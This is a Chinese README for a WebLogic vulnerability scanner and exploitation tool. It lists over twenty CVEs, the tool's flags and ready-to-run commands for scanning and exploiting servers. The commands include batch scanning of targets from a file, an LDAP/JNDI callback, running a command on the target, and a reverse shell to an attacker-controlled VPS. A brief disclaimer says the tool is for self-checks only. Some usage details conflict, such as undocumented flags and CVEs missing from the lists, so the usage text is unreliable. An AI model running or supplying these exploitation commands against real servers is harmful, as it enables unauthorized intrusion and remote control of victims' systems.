只是好好的集成了一下,方便和我一样的懒人。
目前可检测的POC
CVE-2014-4210
CVE-2016-0638
CVE-2016-3510
CVE-2017-10271
CVE-2017-3248
CVE-2017-3506
CVE-2018-2628
CVE-2018-2893
CVE-2018-2894
cve-2018-3191
cve-2018-3245
cve-2018-3252
CVE-2019-2725
CVE-2019-2729
CVE-2019-2890
cve-2020-2551
cve-2020-2555
cve-2020-2883
cve-2020-14750
cve-2020-14882
cve-2020-14883
cve-2023-21839
目前可利用的EXP
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2018-2628
CVE-2018-2893
CVE-2020-14882
cve-2020-2555
cve-2020-2883
cve-2023-21839
-u url
you target, example: 127.0.0.1
-p Port
you target Port, example: "whoami"
-e EXP
Exploitation alone, example: ""
-l ldap
ldap server, example: "ldap://127.0.0.1/#eval"
-ri rip
reverse ip
-rp rport
reverse port
-f targets.txt
Read the target from the file and test the vulnerabilities in batches
- POC一键检测
WeblogicScanner.exe -u 127.0.0.1 -p 7001 -l ldap://127.0.0.1/#eval
- 批量检测
TXT文件中,一个目标(127.0.0.1:7001,如果没有自带端口则添加默认端口7001)放一行。
WeblogicScanner.exe -f "C:\Users\Test\Desktop\target.txt" -l ldap://127.0.0.1/#eval
- EXP单个利用,指定EXP末尾数字即可
//CVE-2023-21839
WeblogicScanner.exe -u 127.0.0.1 -p 7001 -l ldap://127.0.0.1/#eval -e 21839
//cve-2020-2883
//cve-2020-2555
//cve-2016-0638
//cve-2016-0315
//cve-2017-3248
//cve-2018-2628
//cve-2018-2893
//cve-2020-14882
WeblogicScanner.exe -u 127.0.0.1 -p 7001 -c calc.exe -e 2883
//cve-2020-2889
WeblogicScanner.exe -u 127.0.0.1 -p 7001 -c -ri <vps_ip> -rp <VPS_PORT> -e 2889
该工具仅用于安全自查检测
由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。
https://github.com/0xn0ne/weblogicScanner